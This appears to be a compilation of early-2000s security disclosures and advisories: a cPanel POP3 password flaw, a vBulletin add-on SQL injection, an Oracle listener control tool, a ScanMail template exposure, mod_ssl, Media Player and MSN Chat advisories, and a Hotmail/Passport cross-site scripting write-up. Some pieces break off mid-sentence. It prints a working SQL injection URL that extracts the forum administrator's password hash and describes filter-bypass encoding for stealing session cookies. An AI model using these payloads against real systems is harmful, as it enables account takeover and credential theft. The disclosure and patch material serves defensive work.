Topic Articles: POP3 Server provided with the CPanel suite
POP3 Server provided with the CPanel suite tested on version [cppop 20.0], ingores full length of email login password.
it only counts the first 8 characters. this reduces the work factor to crack an email account.
Information
VBulletin PHP Forums, enable add-on features using what is called "Hacks"
which are pieces of codes that extend the forum functionality. One of the
famous hacks, is scrolling the last 10 posts through an IFRAME embedded in
the forum header template.
Discussion
the hack last Posts, started with version
//...........Last X Posts v1.0.5...........
//......by Kevin (kevin@tubescan.com)......
it had a file called "last10config.php" , with the line
# $showforumtitle = "0"; // shows the forum title (linked to that forum)
next to the thread title
which called this part of the script
#
if ($showforumtitle == "1") {
$ftitle = ",forum";
$fsel = ",forum.title AS ftitle";
$wheresql .= " AND
thread.forumid=forum.forumid";
}
#
Later on on other versions such as
//...............Last 10 Posts v2.0.1...........
//.........by Kevin (kevin@tubescan.com)........
//.....Edit by lad_pc (lad_pc@hotmail.com)......
the options were removed, as well as the part of the code on the
corresponding file , yet the SQL statement remained the same as follows
# $query = "SELECT
thread.lastpost,thread.title,thread.lastposter,thread.r
eplycount,thread.views,user.userid,thread.threadid,thre
ad.forumid$fsel,thread.iconid FROM thread,user$ftitle
$wheresql ORDER BY thread.$ob $obdir LIMIT
$maxthreads";
which leaves both $fsel and $ftitle for SQL Injections
Exploit
any none patched website running any version of VB with this hack is
vulnerable as follows
#/last.php?fsel=,user.password%20as%20title,user.%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20WHERE%20usergroupid=1%20LIMIT%201/*
This will output the VB Administrator Encrypted Password, with some cookie
editing you log on to the VB again as the OWNER :) quite annoying
Solution
for easy solution if you do not want to mess up much just add these 2 lines
before the SQL query in file "ttlast.php"
it should look as follows
$fsel="";
$ftitle="";
$query = "SELECT
thread.lastpost,thread.title,thread.lastposter,thread.r
eplycount,thread.views,user.userid,thread.threadid,thre
ad.forumid$fsel,thread.iconid FROM thread,user$ftitle
$wheresql ORDER BY thread.$ob $obdir LIMIT
$maxthreads";
Save file and you are patched
Published on http://www.securityfocus.com/bid/11825/
Most of admins neglect setting password on TNSlsnr Clients for Oracle databases. Oracle ensures that you can either connect to TNSlsnr on a localhost or through mapping to a remote Oracle database using .ora files.
This is not the case anymore
Based on Jwa perl client.
This client is a FULL client, with Packet crafting reassembled.
Supports all the commands as the version that
is shipped with Oracle.
Allow you to totally control an unprotected Oracle Database Server remotelly , without having to map or install Oracle.
Download Here
Commands Supported
ping , version , service , status change_password, help, reload, save_config, set connect_timout
set display_mode, set log_directory , set log_file , set log_status , show , spawn stop
this version works on Oracle9i.
On Oracle 10g only "version" command is working.
This is feedback i got from Pete Finnigan Oracle Security
The 10g listener is by default protected by local authentication rather than by a password like in the 9i and lower listener. This means that because it is protected you cannot use commands like status which can only be used on an un-protected listener. This is the reason that the version command still works, because it can be executed on a password or locally authenticated listener. To be able to get the lsnrctl tool to work remotely you need to disable local authentication.
Currently, i am working on 10g version with D.O.S check , well if you can't own it see if you can bring it down!!
If you have Oracle10g on a public IP and want to share it for testing let me know , just send me the IP by Email
Public Release for ScanMail Vulnerability
I was not sure to release this one or not, but apparently I did.
While reading
http://www.trendmicro.com/ftp/documentation/guides/smd3-admin-guide.pdf,
Starting Page : 108 things became interesting. What if some Admin did not
follow the guide!
On Lotus Domino Server, Trend ScanMail can be installed as the server's
antivirus, according to the guide
some interesting templates can enable the Administrator to control the
ScanMail through a web-enabled
Interface. these templates are smency.nsf, smconf.nsf, smvlog.nsf, smquar.nsf,
smmsg.nsf, smtime.nsf, smhelp.nsf, smftypes.nsf
Coding a quick scanner searching for this file using NASL /Nessus ,http://cgi.nessus.org/plugins/dump.php3?id=14312
and thanks to the Guys on Nessus for upgrading my original script.
Anyway, these files in general can allow you to
Gather more information about the target system
Edit/Delete virus pattern files, then email your own trojanized emails,
which will be treated by victims as trusted scanned email.
With some tweaking you can upload a web-shell script and increase your
access.
Tools Released
Check for most of the Lotus Server Templates in General Download Here If URL is not found then Risk Clear.
If found but password protected then Risk Low.
If found with no protection then Risk High.
Checks also for dying servers and firewall protected HTTP error messages.
http://cgi.nessus.org/plugins/dump.php3?id=14312
To Read More about the templates you can target
http://it.trendmicro-europe.com/enterprise/support/knowledge_base_detail.php?solutionId=19621
Topic Articles: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Poss
SecurityTracker Alert ID: 1004636
CVE Reference: CAN-2002-0653 (Links to External Site)
Date: Jun 27 2002
Impact: Denial of service via local system, Execution of arbitrary code via local system, Modification of user information, User access via local system
Fix Available: Yes Vendor Confirmed: Yes
Version(s): 2.4.9 and prior
Description: A vulnerability was reported in mod_ssl. A local user that can create '.htaccess' files may be able to cause mod_ssl to crash or execute arbitrary code on the system with the privileges of the web server.
An 'off-by-one' error has been reported in mod_ssl. The flaw reportedly exists in the ssl_compat_directive() while invoking the Apache web server rewrite_command extended API (EAPI) hook. According to the report, when backward compatibility is enabled, mod_ssl registers a rewrite_command hook and calls the ssl_compat_directive() function for every line read in a configuration file.
A local user that can create a '.htaccess' file on the web server can place specially crafted information in the file to cause Apache mod_ssl to execute arbitrary code when reading the file (e.g., when a remote user attempts to access a file in a directory protected by the '.htaccess' file).
Servers that allow virtual hosts and have the "AllowOverride" directive not set to "None" for virtual hosts may be affected if local users have access to any part of the web directory. Other configurations may also be vulnerable.
According to the report, mod_ssl compiled without backward compatibility is not vulnerable. However, the backward compatibility feature is reportedly enabled by default during compilation.
Impact: A local user could cause denial of service conditions or could possibly execute arbitrary code with the privileges of the web server.
Solution: The vendor has released a fixed version (2.8.10), available at:
http://www.modssl.org/
Vendor URL: www.modssl.org/ (Links to External Site)
Cause: Boundary error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: Jedi/Sector One
Message History: This archive entry has one or more follow-up message(s) listed below.
Jul 2 2002 (Debian Issues Fix) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Robert van der Meulen )
Debian has issued a fix.
Jul 3 2002 (EnGarde Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (engarde-announce-admins@guardiandigital.com)
EnGarde has released a fix.
Jul 5 2002 (Sun Issues Workaround for Cobalt RaQ) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
Sun has issued a workaround for Cobalt RaQ.
Jul 18 2002 (Red Hat Issues Fix) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (bugzilla@redhat.com)
Red Hat has issued a fix.
Jul 19 2002 (HP Issues Fix for HP Secure OS for Linux) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (support_feedback@us-support-mail.external.hp.com (IT Resource Center ))
HP has released a fix for HP Secure OS for Linux.
Jul 20 2002 (NetScreen Issues Fix for Global PRO Policy Manager) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
NetScreen has issued a patch for their Global PRO and PRO Express Policy Manager Server.
Jul 31 2002 (SuSE Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Roman Drahtmueller )
SuSE has released a fix.
Aug 4 2002 (Apple Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Product Security )
Apple has released a fix.
Aug 9 2002 (Mandrake Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Mandrake Linux Security Team )
Mandrake has released a fix.
Sep 24 2002 (HP Issues Fix for Virtualvault) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
HP has issued a fix for HP-UX Virtualvault.
Jan 28 2003 (Sun Issues Fix for Cobalt RaQ) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
Sun has issued a fix for mod_ssl on Sun Cobalt RaQ devices.
Jan 28 2003 (Sun Issues Fix for Cobalt Qube) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
Sun has issued a fix for the Cobalt Qube device.
Topic Articles: Windows Media Player May Let Remote Users Execute Code on a Target User's Comput
SecurityTracker Alert ID: 1004638
CVE Reference: CAN-2002-0372 , CAN-2002-0373 , CAN-2002-0374 (Links to External Site)
Date: Jun 27 2002
Impact: Disclosure of system information, Execution of arbitrary code via local system, Execution of arbitrary code via network, Root access via local system, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Version(s): 6.4, 7.1, XP
Description: Microsoft reported several vulnerabilities in Windows Media Player. A remote user could execute arbitrary programs or arbitrary scripting code on the user's computer. Also, a local user can execute arbitary code on the system with System level privileges.
Microsoft described several new vulnerabilities in Windows Media Player. These issues are discussed separately below.
First, an information disclosure vulnerability involving the Internet Explorer (IE) Cache directories could allow a remote user to run code on a target user's computer. The code would run with the privileges of the user running Windows Media Player.
This bug is reportedly caused by the player's processing of certain types of licenses for secure media files when the media file is stored in the IE cache. A remote user can supply a certain type of secure Windows Media file (using WM DRM version 1.0) to the user such that, when the file is opened, the media player will incorrectly return information to the server that discloses the location of the IE cache while it is processing the request to the web site specified for handling the licensing information.
A remote user could learn of the location of the IE cache on the target user's local file system and, separately, cause an executable program to be stored in the cache (by sending the user HTML-based e-mail or getting the user to visit a particular web page). Then, the remote user could then directly access (and execute) the stored executable.
In certain configurations, it is reportedly possible for an HTML email to attempt to play a media file automatically, allowing an exploit to occur when the target user views or previews a malicious e-mail message.
Second, a local authenticated user could execute arbitrary commands with System level privileges to take full control of the operating system. The bug reportedly exists in the Windows Media Device Manager (WMDM) Service processing of requests to access invalid local storage devices. WMDM is a component of Windows Media Player and is only used in Windows 2000. So, this flaw reportedly only affects Windows Media Player 7.1 on Windows 2000 systems.
A local user may be able to provide a specially crafted request to connect to an invalid device to gain access to a local resource and execute any local program with LocalSystem privileges.
According to Microsoft, a console session is required to exploit this privilege escalation flaw.
Lastly, a remote user could supply and invoke an HTML script on a target user's computer. The script could take any actions acting as the target user.
The flaw is reportedly due to the storage of the Windows Media active playlist information on the local system in a known location. Playlists typically have a '.asx' extension and are XML-based (and can include HTML script). So, a remote user can exploit this to store and then invoke HTML script in the Local Computer security zone.
A remote user can create a specially formatted media file (that includes a malicious playlist). If this playlist is in the memory when the Windows Media Player is exited (on the target user's computer), the player will write the playlist to a known location on the target user's computer. The remote user can then create a malicious web page that, when subsequently viewed by the target user, will cause the playlist to be executed. The HTML script in the playlist will then run on the target user's computer in the Local Computer zone.
According to the security bulletin, this bug requires several specific, ordered exploit steps:
1) The target user plays specially crafted media file supplied by the remote user.
2) The target user shuts down the media player after playing the file and before playing any other files.
3) The target user views a web page supplied by the remote user.
Microsoft credits jelmer for reporting the Cache Patch Disclosure bug, the Research Team of Security Internals for reporting the Privilege Elevation via Windows Media Device Manager Service issue, and Elias Levy for reporting the Media Playback Script Invocation bug.
Impact: A remote user can cause arbitrary code or arbitrary scripts to be executed on the target user's computer.
A local user can execute commands with System privileges to gain full control of the operating system.
Solution: The vendor has released patches.
For Microsoft Windows Media Player 6.4:
http://download.microsoft.com/download/winmediaplayer/Update/320920/W98NT42KMe/EN-US/wm32092 0_64.exe
For Microsoft Windows Media Player 7.1:
http://download.microsoft.com/download/winmediaplayer/Update/320920/W982KMe/EN-US/wm320920_71.exe
For Microsoft Windows Media Player for Windows XP:
http://download.microsoft.com/download/winmediaplayer/Update/320920/WXP/EN-US/wm320920_8.exe
The patches for 6.4 and 7.1 can reportedly be installed on any operating system running Windows Media Player 6.4 or 7.1. The patch for Windows Media Player for Windows XP can be installed on Windows XP Gold.
Microsoft plans to include the fix in Windows XP SP1.
This patch supersedes the patches referenced in Microsoft's previous security bulletin MS01-056.
Microsoft plans to issue Knowledge Base article Q320920 regarding this issue, to be available shortly at the Microsoft Online Support web site:
http://search.support.microsoft.com/kb/c.asp?SD= SO&LN=EN-US
Vendor URL: www.microsoft.com/technet/security/bulletin/MS02-032.asp (Links to External Site)
Cause: Access control error, Configuration error, Input validation error
Underlying OS: Windows (Any)
Reported By: secnotif@microsoft.com
Message History: None.
-----BEGIN PGP SIGNED MESSAGE-----
CERT Advisory CA-2002-13 Buffer Overflow in Microsoft's MSN Chat ActiveX
Control
Original release date: May 10, 2002
Last revised: --
Source: CERT/CC
A complete revision history can be found at the end of this file.
Systems Affected
Microsoft Windows systems with one or more of the following:
* Microsoft MSN Chat control
* Microsoft MSN Messenger 4.6 and prior
* Microsoft Exchange Instant Messenger 4.6 and prior
Overview
Microsoft's MSN Chat is an ActiveX control for Microsoft Messenger, an
instant messenging client. A buffer overflow exists in the ActiveX
control that may permit a remote attacker to execute arbitrary code on
the system with the privileges of the current user.
I. Description
A buffer overflow exists in the "ResDLL" parameter of the MSN Chat
ActiveX control that may permit a remote attacker to execute arbitrary
code on the system with the privileges of the current user. This
vulnerability affects MSN Messenger and Exchange Instant Messenger
users. Since the control is signed by Microsoft, users of Microsoft's
Internet Explorer (IE) who accept and install Microsoft-signed ActiveX
controls are also affected. The Microsoft MSN Chat control is also
available for direct download from the web.
The
Microsoft Passport
Microsoft Passport: "A single name, password and wallet for the web". This means that using the same credentials you can access your e-mail (Hotmail), instant messenger service (MSN messenger), calendar (task manager, reminders and so on), and loads of other useful services. All these services are centralized and authenticate with a central system called MS passport. Of course as much as any authorised user can browse without supplying a password from a service which makes use of the Passport technology to another, a cracker (malicious hacker) can do the same without much problems once he gets to look like the authorized user. This kind of service is intended for personal use, so people certainly wouldn’t like others to read their e-mail, or view their daily schedule.
Implementation
Microsoft is trying to build everything around their Network, using Passport authentication. This is complaint with the .NET framework, which allows everything to be seamlessly integrated so that users can jump from one service to another without any problems.
As currently implemented, users can authenticate to Passport via a number of ways:
Hotmail and Passport sites
MSN messenger
MSN Explorer
Outlook Express
Other MS applications.
Fooling the system
JavaScript allows users to set and retrieve cookies. This is very useful for normal HTTP sites as well as Web Applications. However Web Applications need a lot more control over normal websites. This control is normally achieved through filtering of possibly malicious code in the HTML.
Users do not need permission to send e-mails to authenticated users, giving them the possibility to post data to an authenticated user’s mailbox. This is obvious to some extent, since we are talking about e-mail. No one needs authentication to send an e-mail to a Hotmail account. Therefore the e-mail sent to the Hotmail user has to be treated as non-trusted content.
Hotmail takes very good care to filter out JavaScript, ActiveX and Java applets. Lately it also started checking for images which link to outside the Hotmail account. Having images linking to non-trusted sites means that those sites can easily track the status of the e-mail (if it was read or not). So that a tag in an html mail such as:
img src=”http://spam.me.com/tracking.gif"
would get filtered by the Hotmail Filtering System. To get around this filtering, one has to just encode the http:// part like &x68;ttp://. 68 is the hex value h, and therefore the Web Browser converts back the encoded value to its original signifier. Of course, the Hotmail filtering system is not working exactly like the Web Browser, and this is where the flaw stands out.
However this is not the major issue I am writing about in this document.
Cross Site Scripting
When a logged in user follows an non-trusted link, the Hotmail credentials do not get sent to the website. The Hotmail filtering system also takes care to hide the URL of the user’s Hotmail account to ensure his privacy (and maybe to prevent other attacks).
On the other hand, when a user follows an MSN (Passport and therefore trusted) site from a non-trusted e-mail, the credentials get sent to the Passport site, and no precautions are taken. This means that the Passport authentication is not broken and therefore the different services provided by MS Passport operate seamlessly as described earlier.
This also means that if an ASP script which resides on any MS Passport enabled site allows the user to customise the page (even if not intended) such as inserting JavaScript code, the whole system is flawed.
In my exploit, a user only needs to click on a trusted link and he (or she) will be sending his (or her) credentials to a remote server.
How is this achieved?
To further explain the issue, I will provide an example of a flawed ASP script on an MS Passport site: ErrorMsg.asp, which resides on http://auctions.msn.com/Scripts/
This ASP script can be passed 2 (or possibly more) arguments:
· Source
· ErrMsg
Here we are concerned with ErrMsg argument. This argument allows different scripts to generate different errors and display them to the user in some nice html.
ErrMsg will usually be filled in with something like “User is not authenticated”. Now what if it is filled with This should be bold. To my astonishment (at the time of writing this is not fixed yet), I got the HTML tag to work, with no filtering from the ASP script.
To further illustrate this, the url which is passed is actually:
http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=This%20should%20be%20bold.
If no filtering is done for JavaScript, we can very easily inject our own JavaScript code to retrieve the session cookie stored in the Hotmail user’s browser. Sadly, lately (during the writing of this document), Microsoft seemed to try to fix this by filtering JavaScript (and embedded scripts) tags and entities. This means when the ASP script is passed the following:
· Script
· Alert
· JavaScript:
· And other commonly used javascript methods
the ASP script simply ignores the input, successfully filtering common Cross Site Scripting attacks.
However Microsoft did not fully patch the issue, so that if HTML encoding were used, the filtering system would not detect the embedded script code, and the code would still be executed.
This means that to produce an alert box to display the session cookies, instead of simply using something like:
http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=
We have to encode the URL such as:
http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=
To complete the exploit the malicious user has to send a URL, which actually passes the Cookie to a 3rd party CGI script (probably made by the cracker exploiting this issue) instead of displaying them to the Hotmail user in a Message box. The end picture could look very similar to the one below.
